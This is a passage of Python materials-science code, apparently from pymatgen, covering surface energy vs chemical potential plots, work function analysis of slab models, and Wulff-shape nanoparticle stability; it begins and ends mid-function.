if entry.adsorbates:
s = entry.cleaned_up_slab
clean_comp = s.composition.reduced_composition
else:
clean_comp = entry.composition.reduced_composition
mark = '--' if ucell_comp != clean_comp else '-'
delu_dict = self.set_all_variables(delu_dict, delu_default)
delu_dict[ref_delu] = chempot_range[0]
gamma_min = self.as_coeffs_dict[entry]
gamma_min = gamma_min if type(gamma_min).__name__ == \
"float" else sub_chempots(gamma_min, delu_dict)
delu_dict[ref_delu] = chempot_range[1]
gamma_max = self.as_coeffs_dict[entry]
gamma_max = gamma_max if type(gamma_max).__name__ == \
"float" else sub_chempots(gamma_max, delu_dict)
gamma_range = [gamma_min, gamma_max]
se_range = np.array(gamma_range) * EV_PER_ANG2_TO_JOULES_PER_M2 \
if JPERM2 else gamma_range
mark = entry.mark if entry.mark else mark
c = entry.color if entry.color else self.color_dict[entry]
plt.plot(chempot_range, se_range, mark, color=c, label=label)
return plt
def chempot_vs_gamma(self, ref_delu, chempot_range, miller_index=(),
delu_dict={}, delu_default=0, JPERM2=False,
show_unstable=False, ylim=[], plt=None,
no_clean=False, no_doped=False,
use_entry_labels=False, no_label=False):
"""
Plots the surface energy as a function of chemical potential.
Each facet will be associated with its own distinct colors.
Dashed lines will represent stoichiometries different from that
of the mpid's compound. Transparent lines indicates adsorption.
Args:
ref_delu (sympy Symbol): The range stability of each slab is based
on the chempot range of this chempot. Should be a sympy Symbol
object of the format: Symbol("delu_el") where el is the name of
the element
chempot_range ([max_chempot, min_chempot]): Range to consider the
stability of the slabs.
miller_index (list): Miller index for a specific facet to get a
dictionary for.
delu_dict (Dict): Dictionary of the chemical potentials to be set as
constant. Note the key should be a sympy Symbol object of the
format: Symbol("delu_el") where el is the name of the element.
delu_default (float): Default value for all unset chemical potentials
JPERM2 (bool): Whether to plot surface energy in /m^2 (True) or
eV/A^2 (False)
show_unstable (bool): Whether or not to show parts of the surface
energy plot outside the region of stability.
ylim ([ymax, ymin]): Range of y axis
no_doped (bool): Whether to plot for the clean slabs only.
no_clean (bool): Whether to plot for the doped slabs only.
use_entry_labels (bool): If True, will label each slab configuration
according to their given label in the SlabEntry object.
no_label (bool): Option to turn off labels.
Returns:
(Plot): Plot of surface energy vs chempot for all entries.
"""
chempot_range = sorted(chempot_range)
plt = pretty_plot(width=8, height=7) if not plt else plt
axes = plt.gca()
for hkl in self.all_slab_entries.keys():
if miller_index and hkl != tuple(miller_index):
continue
# Get the chempot range of each surface if we only
# want to show the region where each slab is stable
if not show_unstable:
stable_u_range_dict = self.stable_u_range_dict(chempot_range, ref_delu,
no_doped=no_doped,
delu_dict=delu_dict,
miller_index=hkl)
already_labelled = []
label = ''
for clean_entry in self.all_slab_entries[hkl]:
urange = stable_u_range_dict[clean_entry] if \
not show_unstable else chempot_range
# Don't plot if the slab is unstable, plot if it is.
if urange != []:
label = clean_entry.label
if label in already_labelled:
label = None
else:
already_labelled.append(label)
if not no_clean:
if use_entry_labels:
label = clean_entry.label
if no_label:
label = ""
plt = self.chempot_vs_gamma_plot_one(plt, clean_entry, ref_delu,
urange, delu_dict=delu_dict,
delu_default=delu_default,
label=label, JPERM2=JPERM2)
if not no_doped:
for ads_entry in self.all_slab_entries[hkl][clean_entry]:
# Plot the adsorbed slabs
# Generate a label for the type of slab
urange = stable_u_range_dict[ads_entry] \
if not show_unstable else chempot_range
if urange != []:
if use_entry_labels:
label = ads_entry.label
if no_label:
label = ""
plt = self.chempot_vs_gamma_plot_one(plt, ads_entry,
ref_delu, urange,
delu_dict=delu_dict,
delu_default=delu_default,
label=label,
JPERM2=JPERM2)
# Make the figure look nice
plt.ylabel(r"Surface energy (J/$m^{2}$)") if JPERM2 \
else plt.ylabel(r"Surface energy (eV/$\AA^{2}$)")
plt = self.chempot_plot_addons(plt, chempot_range, str(ref_delu).split("_")[1],
axes, ylim=ylim)
return plt
def monolayer_vs_BE(self, plot_eads=False):
"""
Plots the binding energy energy as a function of monolayers (ML), i.e.
the fractional area adsorbate density for all facets. For each
facet at a specific monlayer, only plot the lowest binding energy.
Args:
plot_eads (bool): Option to plot the adsorption energy (binding
energy multiplied by number of adsorbates) instead.
Returns:
(Plot): Plot of binding energy vs monolayer for all facets.
"""
plt = pretty_plot(width=8, height=7)
for hkl in self.all_slab_entries.keys():
ml_be_dict = {}
for clean_entry in self.all_slab_entries[hkl].keys():
if self.all_slab_entries[hkl][clean_entry]:
for ads_entry in self.all_slab_entries[hkl][clean_entry]:
if ads_entry.get_monolayer not in ml_be_dict.keys():
ml_be_dict[ads_entry.get_monolayer] = 1000
be = ads_entry.gibbs_binding_energy(eads=plot_eads)
if be < ml_be_dict[ads_entry.get_monolayer]:
ml_be_dict[ads_entry.get_monolayer] = be
# sort the binding energies and monolayers
# in order to properly draw a line plot
vals = sorted(ml_be_dict.items())
monolayers, BEs = zip(*vals)
plt.plot(monolayers, BEs, '-o',
c=self.color_dict[clean_entry], label=hkl)
adsorbates = tuple(ads_entry.ads_entries_dict.keys())
plt.xlabel(" %s" * len(adsorbates) % adsorbates + " Coverage (ML)")
plt.ylabel("Adsorption Energy (eV)") if plot_eads \
else plt.ylabel("Binding Energy (eV)")
plt.legend()
plt.tight_layout()
return plt
def chempot_plot_addons(self, plt, xrange, ref_el, axes, pad=2.4,
rect=[-0.047, 0, 0.84, 1], ylim=[]):
"""
Helper function to a chempot plot look nicer.
Args:
plt (Plot) Plot to add things to.
xrange (list): xlim parameter
ref_el (str): Element of the referenced chempot.
axes(axes) Axes object from matplotlib
pad (float) For tight layout
rect (list): For tight layout
ylim (ylim parameter):
return (Plot): Modified plot with addons.
return (Plot): Modified plot with addons.
"""
# Make the figure look nice
plt.legend(bbox_to_anchor=(1.01, 1), loc=2, borderaxespad=0.)
axes.set_xlabel(r"Chemical potential $\Delta\mu_{%s}$ (eV)" % (ref_el))
ylim = ylim if ylim else axes.get_ylim()
plt.xticks(rotation=60)
plt.ylim(ylim)
xlim = axes.get_xlim()
plt.xlim(xlim)
plt.tight_layout(pad=pad, rect=rect)
plt.plot([xrange[0], xrange[0]], ylim, '--k')
plt.plot([xrange[1], xrange[1]], ylim, '--k')
xy = [np.mean([xrange[1]]), np.mean(ylim)]
plt.annotate("%s-rich" % (ref_el), xy=xy,
xytext=xy, rotation=90, fontsize=17)
xy = [np.mean([xlim[0]]), np.mean(ylim)]
plt.annotate("%s-poor" % (ref_el), xy=xy,
xytext=xy, rotation=90, fontsize=17)
return plt
def BE_vs_clean_SE(self, delu_dict, delu_default=0, plot_eads=False,
annotate_monolayer=True, JPERM2=False):
"""
For each facet, plot the clean surface energy against the most
stable binding energy.
Args:
delu_dict (Dict): Dictionary of the chemical potentials to be set as
constant. Note the key should be a sympy Symbol object of the
format: Symbol("delu_el") where el is the name of the element.
delu_default (float): Default value for all unset chemical potentials
plot_eads (bool): Option to plot the adsorption energy (binding
energy multiplied by number of adsorbates) instead.
annotate_monolayer (bool): Whether or not to label each data point
with its monolayer (adsorbate density per unit primiitve area)
JPERM2 (bool): Whether to plot surface energy in /m^2 (True) or
eV/A^2 (False)
Returns:
(Plot): Plot of clean surface energy vs binding energy for
all facets.
"""
plt = pretty_plot(width=8, height=7)
for hkl in self.all_slab_entries.keys():
for clean_entry in self.all_slab_entries[hkl].keys():
all_delu_dict = self.set_all_variables(delu_dict, delu_default)
if self.all_slab_entries[hkl][clean_entry]:
clean_se = self.as_coeffs_dict[clean_entry]
se = sub_chempots(clean_se, all_delu_dict)
for ads_entry in self.all_slab_entries[hkl][clean_entry]:
ml = ads_entry.get_monolayer
be = ads_entry.gibbs_binding_energy(eads=plot_eads)
# Now plot the surface energy vs binding energy
plt.scatter(se, be)
if annotate_monolayer:
plt.annotate("%.2f" % (ml), xy=[se, be],
xytext=[se, be])
plt.xlabel(r"Surface energy ($J/m^2$)") if JPERM2 \
else plt.xlabel(r"Surface energy ($eV/\AA^2$)")
plt.ylabel("Adsorption Energy (eV)") if plot_eads \
else plt.ylabel("Binding Energy (eV)")
plt.tight_layout()
plt.xticks(rotation=60)
return plt
def surface_chempot_range_map(self, elements, miller_index, ranges,
incr=50, no_doped=False, no_clean=False,
delu_dict=None, plt=None, annotate=True,
show_unphyiscal_only=False, fontsize=10):
"""
Adapted from the get_chempot_range_map() method in the PhaseDiagram
class. Plot the chemical potential range map based on surface
energy stability. Currently works only for 2-component PDs. At
the moment uses a brute force method by enumerating through the
range of the first element chempot with a specified increment
and determines the chempot rangeo fht e second element for each
SlabEntry. Future implementation will determine the chempot range
map first by solving systems of equations up to 3 instead of 2.
Args:
elements (list): Sequence of elements to be considered as independent
variables. E.g., if you want to show the stability ranges of
all Li-Co-O phases wrt to duLi and duO, you will supply
[Element("Li"), Element("O")]
miller_index ([h, k, l]): Miller index of the surface we are interested in
ranges ([[range1], [range2]]): List of chempot ranges (max and min values)
for the first and second element.
incr (int): Number of points to sample along the range of the first chempot
no_doped (bool): Whether or not to include doped systems.
no_clean (bool): Whether or not to include clean systems.
delu_dict (Dict): Dictionary of the chemical potentials to be set as
constant. Note the key should be a sympy Symbol object of the
format: Symbol("delu_el") where el is the name of the element.
annotate (bool): Whether to annotate each "phase" with the label of
the entry. If no label, uses the reduced formula
show_unphyiscal_only (bool): Whether to only show the shaded region where
surface energy is negative. Useful for drawing other chempot range maps.
"""
# Set up
delu_dict = delu_dict if delu_dict else {}
plt = pretty_plot(12, 8) if not plt else plt
el1, el2 = str(elements[0]), str(elements[1])
delu1 = Symbol("delu_%s" % (str(elements[0])))
delu2 = Symbol("delu_%s" % (str(elements[1])))
range1 = ranges[0]
range2 = ranges[1]
# Find a range map for each entry (surface). This part is very slow, will
# need to implement a more sophisticated method of getting the range map
vertices_dict = {}
for dmu1 in np.linspace(range1[0], range1[1], incr):
# Get chemical potential range of dmu2 for each increment of dmu1
new_delu_dict = delu_dict.copy()
new_delu_dict[delu1] = dmu1
range_dict, se_dict = self.stable_u_range_dict(range2, delu2, dmu_at_0=True,
miller_index=miller_index,
no_doped=no_doped,
no_clean=no_clean,
delu_dict=new_delu_dict,
return_se_dict=True)
# Save the chempot range for dmu1 and dmu2
for entry in range_dict.keys():
if not range_dict[entry]:
continue
if entry not in vertices_dict.keys():
vertices_dict[entry] = []
selist = se_dict[entry]
vertices_dict[entry].append({delu1: dmu1, delu2: [range_dict[entry], selist]})
# Plot the edges of the phases
for entry in vertices_dict.keys():
xvals, yvals = [], []
# Plot each edge of a phase within the borders
for ii, pt1 in enumerate(vertices_dict[entry]):
# Determine if the surface energy at this lower range
# of dmu2 is negative. If so, shade this region.
if len(pt1[delu2][1]) == 3:
if pt1[delu2][1][0] < 0:
neg_dmu_range = [pt1[delu2][0][0], pt1[delu2][0][1]]
else:
neg_dmu_range = [pt1[delu2][0][1], pt1[delu2][0][2]]
# Shade the threshold and region at which se<=0
plt.plot([pt1[delu1], pt1[delu1]], neg_dmu_range, 'k--')
elif pt1[delu2][1][0] < 0 and pt1[delu2][1][1] < 0:
# Any chempot at at this point will result
# in se<0, shade the entire y range
if not show_unphyiscal_only:
plt.plot([pt1[delu1], pt1[delu1]], range2, 'k--')
if ii == len(vertices_dict[entry]) - 1:
break
pt2 = vertices_dict[entry][ii + 1]
if not show_unphyiscal_only:
plt.plot([pt1[delu1], pt2[delu1]], [pt1[delu2][0][0], pt2[delu2][0][0]], 'k')
# Need these values to get a good position for labelling phases
xvals.extend([pt1[delu1], pt2[delu1]])
yvals.extend([pt1[delu2][0][0], pt2[delu2][0][0]])
# Plot the edge along the max x value
pt = vertices_dict[entry][-1]
delu1, delu2 = pt.keys()
xvals.extend([pt[delu1], pt[delu1]])
yvals.extend(pt[delu2][0])
if not show_unphyiscal_only:
plt.plot([pt[delu1], pt[delu1]], [pt[delu2][0][0], pt[delu2][0][-1]], 'k')
if annotate:
# Label the phases
x = np.mean([max(xvals), min(xvals)])
y = np.mean([max(yvals), min(yvals)])
label = entry.label if entry.label else entry.composition.reduced_formula
plt.annotate(label, xy=[x, y], xytext=[x, y], fontsize=fontsize)
# Label plot
plt.xlim(range1)
plt.ylim(range2)
plt.xlabel(r"$\Delta\mu_{%s} (eV)$" % (el1), fontsize=25)
plt.ylabel(r"$\Delta\mu_{%s} (eV)$" % (el2), fontsize=25)
plt.xticks(rotation=60)
return plt
def set_all_variables(self, delu_dict, delu_default):
"""
Sets all chemical potential values and returns a dictionary where
the key is a sympy Symbol and the value is a float (chempot).
Args:
entry (SlabEntry): Computed structure entry of the slab
delu_dict (Dict): Dictionary of the chemical potentials to be set as
constant. Note the key should be a sympy Symbol object of the
format: Symbol("delu_el") where el is the name of the element.
delu_default (float): Default value for all unset chemical potentials
Returns:
Dictionary of set chemical potential values
"""
# Set up the variables
all_delu_dict = {}
for du in self.list_of_chempots:
if delu_dict and du in delu_dict.keys():
all_delu_dict[du] = delu_dict[du]
elif du == 1:
all_delu_dict[du] = du
else:
all_delu_dict[du] = delu_default
return all_delu_dict
# def surface_phase_diagram(self, y_param, x_param, miller_index):
# return
#
# def wulff_shape_extrapolated_model(self):
# return
#
# def surface_pourbaix_diagram(self):
#
# return
#
# def surface_p_vs_t_phase_diagram(self):
#
# return
#
# def broken_bond_vs_gamma(self):
#
# return
def entry_dict_from_list(all_slab_entries):
"""
Converts a list of SlabEntry to an appropriate dictionary. It is
assumed that if there is no adsorbate, then it is a clean SlabEntry
and that adsorbed SlabEntry has the clean_entry parameter set.
Args:
all_slab_entries (list): List of SlabEntry objects
Returns:
(dict): Dictionary of SlabEntry with the Miller index as the main
key to a dictionary with a clean SlabEntry as the key to a
list of adsorbed SlabEntry.
"""
entry_dict = {}
for entry in all_slab_entries:
hkl = tuple(entry.miller_index)
if hkl not in entry_dict.keys():
entry_dict[hkl] = {}
if entry.clean_entry:
clean = entry.clean_entry
else:
clean = entry
if clean not in entry_dict[hkl].keys():
entry_dict[hkl][clean] = []
if entry.adsorbates:
entry_dict[hkl][clean].append(entry)
return entry_dict
class WorkFunctionAnalyzer:
"""
A class used for calculating the work function
from a slab model and visualizing the behavior
of the local potential along the slab.
.. attribute:: efermi
The Fermi energy
.. attribute:: locpot_along_c
Local potential in eV along points along the axis
.. attribute:: vacuum_locpot
The maximum local potential along the c direction for
the slab model, ie the potential at the vacuum
.. attribute:: work_function
The minimum energy needed to move an electron from the
surface to infinity. Defined as the difference between
the potential at the vacuum and the Fermi energy.
.. attribute:: slab
The slab structure model
.. attribute:: along_c
Points along the c direction with same
increments as the locpot in the c axis
.. attribute:: ave_locpot
Mean of the minimum and maximmum (vacuum) locpot along c
.. attribute:: sorted_sites
List of sites from the slab sorted along the c direction
.. attribute:: ave_bulk_p
The average locpot of the slab region along the c direction
"""
def __init__(self, structure, locpot_along_c, efermi, shift=0, blength=3.5):
"""
Initializes the WorkFunctionAnalyzer class.
Args:
structure (Structure): Structure object modelling the surface
locpot_along_c (list): Local potential along the c direction
outcar (MSONable): Outcar vasp output object
shift (float): Parameter to translate the slab (and
therefore the vacuum) of the slab structure, thereby
translating the plot along the x axis.
blength (float (Ang)): The longest bond length in the material.
Used to handle pbc for noncontiguous slab layers
"""
# ensure shift between 0 and 1
if shift < 0:
shift += -1*int(shift) + 1
elif shift >= 1:
shift -= int(shift)
self.shift = shift
# properties that can be shifted
slab = structure.copy()
slab.translate_sites([i for i, site in enumerate(slab)], [0, 0, self.shift])
self.slab = slab
self.sorted_sites = sorted(self.slab, key=lambda site: site.frac_coords[2])
# Get the plot points between 0 and c
# increments of the number of locpot points
self.along_c = np.linspace(0, 1, num=len(locpot_along_c))
# Get the plot points between 0 and c
# increments of the number of locpot points
locpot_along_c_mid, locpot_end, locpot_start = [], [], []
for i, s in enumerate(self.along_c):
j = s + self.shift
if j > 1:
locpot_start.append(locpot_along_c[i])
elif j < 0:
locpot_end.append(locpot_along_c[i])
else:
locpot_along_c_mid.append(locpot_along_c[i])
self.locpot_along_c = locpot_start + locpot_along_c_mid + locpot_end
# identify slab region
self.slab_regions = get_slab_regions(self.slab, blength=blength)
# get the average of the signal in the bulk-like region of the
# slab, i.e. the average of the oscillating region. This gives
# a rough appr. of the potential in the interior of the slab
bulk_p = []
for r in self.slab_regions:
bulk_p.extend([p for i, p in enumerate(self.locpot_along_c) if \
r[1] >= self.along_c[i] > r[0]])
if len(self.slab_regions) > 1:
bulk_p.extend([p for i, p in enumerate(self.locpot_along_c) if \
self.slab_regions[1][1] <= self.along_c[i]])
bulk_p.extend([p for i, p in enumerate(self.locpot_along_c) if \
self.slab_regions[0][0] >= self.along_c[i]])
self.ave_bulk_p = np.mean(bulk_p)
# shift independent quantities
self.efermi = efermi
self.vacuum_locpot = max(self.locpot_along_c)
# get the work function
self.work_function = self.vacuum_locpot - self.efermi
# for setting ylim and annotating
self.ave_locpot = (self.vacuum_locpot-min(self.locpot_along_c))/2
def get_locpot_along_slab_plot(self, label_energies=True,
plt=None, label_fontsize=10):
"""
Returns a plot of the local potential (eV) vs the
position along the c axis of the slab model (Ang)
Args:
label_energies (bool): Whether to label relevant energy
quantities such as the work function, Fermi energy,
vacuum locpot, bulk-like locpot
plt (plt): Matplotlib pylab object
label_fontsize (float): Fontsize of labels
Returns plt of the locpot vs c axis
"""
plt = pretty_plot(width=6, height=4) if not plt else plt
# plot the raw locpot signal along c
plt.plot(self.along_c, self.locpot_along_c, 'b--')
# Get the local averaged signal of the locpot along c
xg, yg = [], []
for i, p in enumerate(self.locpot_along_c):
# average signal is just the bulk-like potential when in the slab region
in_slab = False
for r in self.slab_regions:
if r[0] <= self.along_c[i] <= r[1]:
in_slab = True
if len(self.slab_regions) > 1:
if self.along_c[i] >= self.slab_regions[1][1]:
in_slab = True
if self.along_c[i] <= self.slab_regions[0][0]:
in_slab = True
if in_slab:
yg.append(self.ave_bulk_p)
xg.append(self.along_c[i])
elif p < self.ave_bulk_p:
yg.append(self.ave_bulk_p)
xg.append(self.along_c[i])
else:
yg.append(p)
xg.append(self.along_c[i])
xg, yg = zip(*sorted(zip(xg, yg)))
plt.plot(xg, yg, 'r', linewidth=2.5, zorder=-1)
# make it look nice
if label_energies:
plt = self.get_labels(plt, label_fontsize=label_fontsize)
plt.xlim([0, 1])
plt.ylim([min(self.locpot_along_c),
self.vacuum_locpot+self.ave_locpot*0.2])
plt.xlabel(r"Fractional coordinates ($\hat{c}$)", fontsize=25)
plt.xticks(fontsize=15, rotation=45)
plt.ylabel(r"Potential (eV)", fontsize=25)
plt.yticks(fontsize=15)
return plt
def get_labels(self, plt, label_fontsize=10):
"""
Handles the optional labelling of the plot with relevant quantities
Args:
plt (plt): Plot of the locpot vs c axis
label_fontsize (float): Fontsize of labels
Returns Labelled plt
"""
# center of vacuum and bulk region
if len(self.slab_regions) > 1:
label_in_vac = (self.slab_regions[0][1] + self.slab_regions[1][0])/2
if abs(self.slab_regions[0][0]-self.slab_regions[0][1]) > \
abs(self.slab_regions[1][0]-self.slab_regions[1][1]):
label_in_bulk = self.slab_regions[0][1]/2
else:
label_in_bulk = (self.slab_regions[1][1] + self.slab_regions[1][0]) / 2
else:
label_in_bulk = (self.slab_regions[0][0] + self.slab_regions[0][1])/2
if self.slab_regions[0][0] > 1-self.slab_regions[0][1]:
label_in_vac = self.slab_regions[0][0] / 2
else:
label_in_vac = (1 + self.slab_regions[0][1]) / 2
plt.plot([0, 1], [self.vacuum_locpot]*2, 'b--', zorder=-5, linewidth=1)
xy = [label_in_bulk, self.vacuum_locpot+self.ave_locpot*0.05]
plt.annotate(r"$V_{vac}=%.2f$" %(self.vacuum_locpot), xy=xy,
xytext=xy, color='b', fontsize=label_fontsize)
# label the fermi energy
plt.plot([0, 1], [self.efermi]*2, 'g--',
zorder=-5, linewidth=3)
xy = [label_in_bulk, self.efermi+self.ave_locpot*0.05]
plt.annotate(r"$E_F=%.2f$" %(self.efermi), xytext=xy,
xy=xy, fontsize=label_fontsize, color='g')
# label the bulk-like locpot
plt.plot([0, 1], [self.ave_bulk_p]*2, 'r--', linewidth=1., zorder=-1)
xy = [label_in_vac, self.ave_bulk_p + self.ave_locpot * 0.05]
plt.annotate(r"$V^{interior}_{slab}=%.2f$" % (self.ave_bulk_p),
xy=xy, xytext=xy, color='r', fontsize=label_fontsize)
# label the work function as a barrier
plt.plot([label_in_vac]*2, [self.efermi, self.vacuum_locpot],
'k--', zorder=-5, linewidth=2)
xy = [label_in_vac, self.efermi + self.ave_locpot * 0.05]
plt.annotate(r"$\Phi=%.2f$" %(self.work_function),
xy=xy, xytext=xy, fontsize=label_fontsize)
return plt
def is_converged(self, min_points_frac=0.015, tol=0.0025):
"""
A well converged work function should have a flat electrostatic
potential within some distance (min_point) about where the peak
electrostatic potential is found along the c direction of the
slab. This is dependent on the size of the slab.
Args:
min_point (fractional coordinates): The number of data points
+/- the point of where the electrostatic potential is at
its peak along the c direction.
tol (float): If the electrostatic potential stays the same
within this tolerance, within the min_points, it is converged.
Returns a bool (whether or not the work function is converged)
"""
conv_within = tol*(max(self.locpot_along_c)-min(self.locpot_along_c))
min_points = int(min_points_frac*len(self.locpot_along_c))
peak_i = self.locpot_along_c.index(self.vacuum_locpot)
all_flat = []
for i in range(len(self.along_c)):
if peak_i - min_points < i < peak_i + min_points:
if abs(self.vacuum_locpot - self.locpot_along_c[i]) > conv_within:
all_flat.append(False)
else:
all_flat.append(True)
return all(all_flat)
@staticmethod
def from_files(poscar_filename, locpot_filename, outcar_filename, shift=0, blength=3.5):
p = Poscar.from_file(poscar_filename)
l = Locpot.from_file(locpot_filename)
o = Outcar(outcar_filename)
return WorkFunctionAnalyzer(p.structure, l.get_average_along_axis(2),
o.efermi, shift=shift, blength=blength)
class NanoscaleStability:
"""
A class for analyzing the stability of nanoparticles of different
polymorphs with respect to size. The Wulff shape will be the
model for the nanoparticle. Stability will be determined by
an energetic competition between the weighted surface energy
(surface energy of the Wulff shape) and the bulk energy. A
future release will include a 2D phase diagram (e.g. wrt size
vs chempot for adsorbed or nonstoichiometric surfaces). Based
on the following work:
Kang, S., Mo, Y., Ong, S. P., & Ceder, G. (2014). Nanoscale
stabilization of sodium oxides: Implications for Na-O2
batteries. Nano Letters, 14(2), 1016–1020.
https://doi.org/10.1021/nl404557w
.. attribute:: se_analyzers
List of SurfaceEnergyPlotter objects. Each item corresponds to a
different polymorph.
.. attribute:: symprec
See WulffShape.
"""
def __init__(self, se_analyzers, symprec=1e-5):
"""
Analyzes the nanoscale stability of different polymorphs.
"""
self.se_analyzers = se_analyzers
self.symprec = symprec
def solve_equilibrium_point(self, analyzer1, analyzer2,
delu_dict={}, delu_default=0, units="nanometers"):
"""
Gives the radial size of two particles where equilibrium is reached
between both particles. NOTE: the solution here is not the same
as the solution visualized in the plot because solving for r
requires that both the total surface area and volume of the
particles are functions of r.
Args:
analyzer1 (SurfaceEnergyPlotter): Analyzer associated with the
first polymorph
analyzer2 (SurfaceEnergyPlotter): Analyzer associated with the
second polymorph
delu_dict (Dict): Dictionary of the chemical potentials to be set as
constant. Note the key should be a sympy Symbol object of the
format: Symbol("delu_el") where el is the name of the element.
delu_default (float): Default value for all unset chemical potentials
units (str): Can be nanometers or Angstrom
Returns:
Particle radius in nm
"""
# Set up
wulff1 = analyzer1.wulff_from_chempot(delu_dict=delu_dict,
delu_default=delu_default,
symprec=self.symprec)
wulff2 = analyzer2.wulff_from_chempot(delu_dict=delu_dict,
delu_default=delu_default,
symprec=self.symprec)
# Now calculate r
delta_gamma = wulff1.weighted_surface_energy - wulff2.weighted_surface_energy
delta_E = self.bulk_gform(analyzer1.ucell_entry) - self.bulk_gform(analyzer2.ucell_entry)
r = ((-3 * delta_gamma) / (delta_E))
return r / 10 if units == "nanometers" else r
def wulff_gform_and_r(self, wulffshape, bulk_entry, r, from_sphere_area=False,
r_units="nanometers", e_units="keV", normalize=False,
scale_per_atom=False):
"""
Calculates the formation energy of the particle with arbitrary radius r.
Args:
wulffshape (WulffShape): Initial, unscaled WulffShape
bulk_entry (ComputedStructureEntry): Entry of the corresponding bulk.
r (float (Ang)): Arbitrary effective radius of the WulffShape
from_sphere_area (bool): There are two ways to calculate the bulk
formation energy. Either by treating the volume and thus surface
area of the particle as a perfect sphere, or as a Wulff shape.
r_units (str): Can be nanometers or Angstrom
e_units (str): Can be keV or eV
normalize (bool): Whether or not to normalize energy by volume
scale_per_atom (True): Whether or not to normalize by number of
atoms in the particle
Returns:
particle formation energy (float in keV), effective radius
"""
# Set up
miller_se_dict = wulffshape.miller_energy_dict
new_wulff = self.scaled_wulff(wulffshape, r)
new_wulff_area = new_wulff.miller_area_dict
# calculate surface energy of the particle
if not from_sphere_area:
# By approximating the particle as a Wulff shape
w_vol = new_wulff.volume
tot_wulff_se = 0
for hkl in new_wulff_area.keys():
tot_wulff_se += miller_se_dict[hkl] * new_wulff_area[hkl]
Ebulk = self.bulk_gform(bulk_entry) * w_vol
new_r = new_wulff.effective_radius
else:
# By approximating the particle as a perfect sphere
w_vol = (4 / 3) * np.pi * r ** 3
sphere_sa = 4 * np.pi * r ** 2
tot_wulff_se = wulffshape.weighted_surface_energy * sphere_sa
Ebulk = self.bulk_gform(bulk_entry) * w_vol
new_r = r
new_r = new_r / 10 if r_units == "nanometers" else new_r
e = (Ebulk + tot_wulff_se)
e = e / 1000 if e_units == "keV" else e
e = e / ((4/3)*np.pi*new_r**3) if normalize else e
bulk_struct = bulk_entry.structure
density = len(bulk_struct)/bulk_struct.lattice.volume
e = e/(density*w_vol) if scale_per_atom else e
return e, new_r
def bulk_gform(self, bulk_entry):
"""
Returns the formation energy of the bulk
Args:
bulk_entry (ComputedStructureEntry): Entry of the corresponding bulk.
"""
return bulk_entry.energy/bulk_entry.structure.lattice.volume
def scaled_wulff(self, wulffshape, r):
"""
Scales the Wulff shape with an effective radius r. Note that the resulting
Wulff does not neccesarily have the same effective radius as the one
provided. The Wulff shape is scaled by its surface energies where first
the surface energies are scale by the minimum surface energy and then
multiplied by the given effective radius.
Args:
wulffshape (WulffShape): Initial, unscaled WulffShape
r (float): Arbitrary effective radius of the WulffShape
Returns:
WulffShape (scaled by r)
"""
# get the scaling ratio for the energies
r_ratio = r/wulffshape.effective_radius
miller_list = wulffshape.miller_energy_dict.keys()
# Normalize the magnitude of the facet normal vectors
# of the Wulff shape by the minimum surface energy.
se_list = np.array(list(wulffshape.miller_energy_dict.values()))
# Scale the magnitudes by r_ratio
scaled_se = se_list * r_ratio
return WulffShape(wulffshape.lattice, miller_list,
scaled_se, symprec=self.symprec)
def plot_one_stability_map(self, analyzer, max_r, delu_dict=None, label="",
increments=50, delu_default=0, plt=None,
from_sphere_area=False, e_units="keV",
r_units="nanometers", normalize=False,
scale_per_atom=False):
"""
Returns the plot of the formation energy of a particle against its
effect radius
Args:
analyzer (SurfaceEnergyPlotter): Analyzer associated with the
first polymorph
max_r (float): The maximum radius of the particle to plot up to.
delu_dict (Dict): Dictionary of the chemical potentials to be set as
constant. Note the key should be a sympy Symbol object of the
format: Symbol("delu_el") where el is the name of the element.
label (str): Label of the plot for legend
increments (int): Number of plot points
delu_default (float): Default value for all unset chemical potentials
plt (pylab): Plot
from_sphere_area (bool): There are two ways to calculate the bulk
formation energy. Either by treating the volume and thus surface
area of the particle as a perfect sphere, or as a Wulff shape.
r_units (str): Can be nanometers or Angstrom
e_units (str): Can be keV or eV
normalize (str): Whether or not to normalize energy by volume
"""
plt = plt if plt else pretty_plot(width=8, height=7)
wulffshape = analyzer.wulff_from_chempot(delu_dict=delu_dict,
delu_default=delu_default,
symprec=self.symprec)
gform_list, r_list = [], []
for r in np.linspace(1e-6, max_r, increments):
gform, r = self.wulff_gform_and_r(wulffshape, analyzer.ucell_entry,
r, from_sphere_area=from_sphere_area,
r_units=r_units, e_units=e_units,
normalize=normalize,
scale_per_atom=scale_per_atom)
gform_list.append(gform)
r_list.append(r)
ru = "nm" if r_units == "nanometers" else "\AA"
plt.xlabel(r"Particle radius ($%s$)" %(ru))
eu = "$%s/%s^3$" %(e_units, ru)
plt.ylabel(r"$G_{form}$ (%s)" %(eu))
plt.plot(r_list, gform_list, label=label)
return plt
def plot_all_stability_map(self, max_r, increments=50, delu_dict=None,
delu_default=0, plt=None, labels=None,
from_sphere_area=False, e_units="keV",
r_units="nanometers", normalize=False,
scale_per_atom=False):
"""
Returns the plot of the formation energy of a particles
of different polymorphs against its effect radius
Args:
max_r (float): The maximum radius of the particle to plot up to.
increments (int): Number of plot points
delu_dict (Dict): Dictionary of the chemical potentials to be set as
constant. Note the key should be a sympy Symbol object of the
format: Symbol("delu_el") where el is the name of the element.
delu_default (float): Default value for all unset chemical potentials
plt (pylab): Plot
labels (list): List of labels for each plot, corresponds to the
list of se_analyzers
from_sphere_area (bool): There are two ways to calculate the bulk
formation energy. Either by treating the volume and thus surface
area of the particle as a perfect sphere, or as a Wulff shape.
"""
plt = plt if plt else pretty_plot(width=8, height=7)
for i, analyzer in enumerate(self.se_analyzers):
label = labels[i] if labels else ""
plt = self.plot_one_stability_map(analyzer, max_r, delu_dict,
label=label, plt=plt,
increments=increments,
delu_default=delu_default,
from_sphere_area=from_sphere_area,
e_units=e_units, r_units=r_units,
normalize=normalize,
scale_per_atom=scale_per_atom)
return plt
# class GetChempotRange:
# def __init__(self, entry):
# self.entry = entry
#
#
# class SlabEntryGenerator:
# def __init__(self, entry):
# self.entry = entry
def sub_chempots(gamma_dict, chempots):
"""
Uses dot product of numpy array to sub chemical potentials
into the surface grand potential. This is much faster
than using the subs function in sympy.
Args:
gamma_dict (dict): Surface grand potential equation
as a coefficient dictionary
chempots (dict): Dictionary assigning each chemical
potential (key) in gamma a value
Returns:
Surface energy as a float
"""
coeffs = [gamma_dict[k] for k in gamma_dict.keys()]
chempot_vals = []
for k in gamma_dict.keys():
if k not in chempots.keys():
chempot_vals.append(k)
elif k == 1:
chempot_vals.append(1)
else:
